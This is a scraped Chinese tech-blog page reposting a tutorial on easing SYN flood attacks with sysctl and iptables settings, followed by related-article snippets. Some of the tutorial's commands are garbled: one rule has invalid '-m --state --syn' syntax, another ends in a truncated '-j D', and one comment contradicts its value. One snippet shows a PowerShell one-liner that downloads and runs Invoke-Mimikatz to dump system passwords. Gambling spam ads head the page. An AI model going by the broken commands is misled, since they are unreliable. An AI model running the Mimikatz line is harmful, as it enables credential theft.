??斗地主捕鱼电竞提现秒到 广告位招租 - 15元/月全站展示
??支付宝搜索579087183领大额红包 ??伍彩集团官网直营彩票
??好待遇→招代理 ??伍彩集团官网直营彩票
??络茄网 广告位招租 - 15元/月全站展示
服务器遭到SYN功击怎么办?如何防御SYN功击?

转载   近墨者黒   2018-11-15   浏览量:17


SYN洪水功击是DDOS功击中最常见的功击类型之一。是一种利用TCP 协议缺陷,功击者向被功击的主机发送大量伪造的TCP连接请求,从而使得被功击方主机服务器的资源耗尽(CPU 满负荷或内存不足) 的功击方式。SYN功击的目标不止于服务器,任何网络设备,都可能会受到这种功击,针对网络设备的SYN功击往往会导致整个网络瘫痪。企业遭到SYN功击该如何防御呢?墨者安全通过以往的高防经验来分享一下如何利用iptables来缓解SYN功击。


QQ截图20181115163716.jpg



1、修改等待数

sysctl -w net.ipv4.tcp_max_syn_backlog=2048


2、启用syncookies

sysctl -w net.ipv4.tcp_syncookies=1


3、修改重试次数

sysctl -w net.ipv4.tcp_syn_retries = 0

重传次数设置为0,只要收不到客户端的响应,立即丢弃该连接,默认设置为5次


4、限制单IP并发数

使用iptables限制单个地址的并发连接数量:

iptables -t filter -A INPUT -p tcp --dport 80 --tcp-flags FIN,SYN,RST,ACK SYN -m connlimit --connlimit-above 10 --connlimit-mask 32 -j REJECT


5、限制C类子网并发数

使用iptables限制单个c类子网的并发链接数量:

iptables -t filter -A INPUT -p tcp --dport 80 --tcp-flags FIN,SYN,RST,ACK SYN -m connlimit --connlimit-above 10 --connlimit-mask 24 -j REJECT


6、限制单位时间内连接数

设置如下:

iptables -t filter -A INPUT -p tcp --dport 80 -m --state --syn -m recent --set

iptables -t filter -A INPUT -p tcp --dport 80 -m --state --syn -m recent --update --seconds 60 --hitcount 30 -j DROP


7、修改modprobe.conf

为了取得更好的效果,需要修改/etc/modprobe.conf

options ipt_recent ip_list_tot=1000 ip_pkt_list_tot=60

作用:记录10000个地址,每个地址60个包,ip_list_tot最大为8100,超过这个数值会导致iptables错误


8、限制单个地址最大连接数

iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 50 -j D



QQ截图20180928102343.png


通过上述这些设置,可以缓解SYN功击带来的影响,但如果遭到几百几千G的T级流量洪水功击,那只能选择像墨者安全那样的商业级的防DDOS服务了。墨者盾高防可以隐藏服务器真实IP,利用新的WAF算法过滤技术,清除DDOS异常流量,保障服务器正常运行。


转载自://blog.51cto.com/13941676/2317518

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Java源代码加密,防止反编译
使用VirboxProtector对Java项目加密有两种方式,一种是对War包加密,一种是对Jar包加密。VirboxProtector支持这两种文件格式加密,可以加密用于解析class文件的java.exe,并且可以实现项目源码绑定制定设备,防止部署到客户服务器的项目被整体拷贝。两种加密方式War包加密当你的项目在没有完成竣工的时候,不适合使用war文件,因为你的类会由于调试之类的经
Invoke-Mimikatz.ps1获取系统密码
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell"IEX(New-ObjectNet.WebClient).DownloadStr
机房设备,怎样保证高效运行?
机房里面一般摆设着都是网络机柜组合安装面板、插件、插箱、电子元件、器件和机械零件与部件构成了一个密集型柜子。网络机柜里面设备众多,并且价格不菲,对这些机柜和设备的保养就显得非常重要了。应该如何有效的保养机房设备,保证其高效运行呢? 空间控制服务器的空间控制主要是为了便于规划、管理,还有一个小的原因也是为了上文提到的温控制,以实现更好的散热。 服务器的杂乱摆放或者网线的随处陈列,
咨询一下数据防泄漏DLP相关的解决方案?
目前我们在给客户做数据防泄露的方案时,遇到了一系列的难题,我们推出的解决方案客户不是很喜欢,看一下知乎有没有大神给支点招啊??突Щ厩榭龊托枨?客户是一家医院,内网是不能上外网的。他们想把院内拍了片的图像,让院内内部人员自行去下载拷贝。前提是能保障内网网络安全,又能做到图像外发安全审计。确保图像能在安全审计(能审计到图像在哪台终端、哪个用户、什么时间、拷贝走了哪些文件)的情况下,内部网络中需要的P
DM***学习笔记(2018.5.25-30
***分类第一大类:site-to-site***1、gre2、ipsec***3、mpls***第二大类:Remoteaccess***1、ipsec***2、VPDN(虚拟私有拨号网络)3、SSL***(安全套接层)---------------------------GRE------------------------------不要把公网路由放入私网协议中先路由再NAT触发
如何防范你的微薄账号被盗(新浪微博与qq微博)
QQ账号和微博账号都属于个人财产,虽然网络账号被盗取暂时还没有明确的相关法律规定。但国家已经发布了互联网管理的基础性法规《互联网信息服务管理办法》进行规范,也已经设立相关的网络警察部门进行执法
DMVPN学习笔记(2018.5.25-30
vpn分类第一大类:site-to-sitevpn1、gre2、ipsecvpn3、mplsvpn第二大类:Remoteaccessvpn1、ipsecvpn2、VPDN(虚拟私有拨号网络)3、SSLVPN(安全套接层)---------------------------GRE------------------------------不要把公网路由放入私网协议中先路由再NAT触发
设定安全log服务器呢(RedHat)的方法
在网上越来越多的hacker 的出现, 越来越多的高手出现的情况下.如何才能确保自己可以保存一份完整的log 呢?稍微有点概念的hacker 都知道,进入系统后的第一见事情就是去清理log, 而发现入侵的最简单最直接的方法就是去看系统纪录文件.现在我们来说说如何设定一个安全的lo
IIS Short File/Folder Name Disclosure(iis短文件或文件夹名泄露)
IIS Short File/Folder Name Disclosure(iis短文件或文件夹名泄露)
关于BYOD(携带自己设备到工作场所)政策的接入和安全性解读
网络管理人员很快会意识到部署“携带自己设备到工作场所(BYOD)”政策不仅仅是授权iPhone上的电子邮件,为员工的设备创建SSID用以访问网络。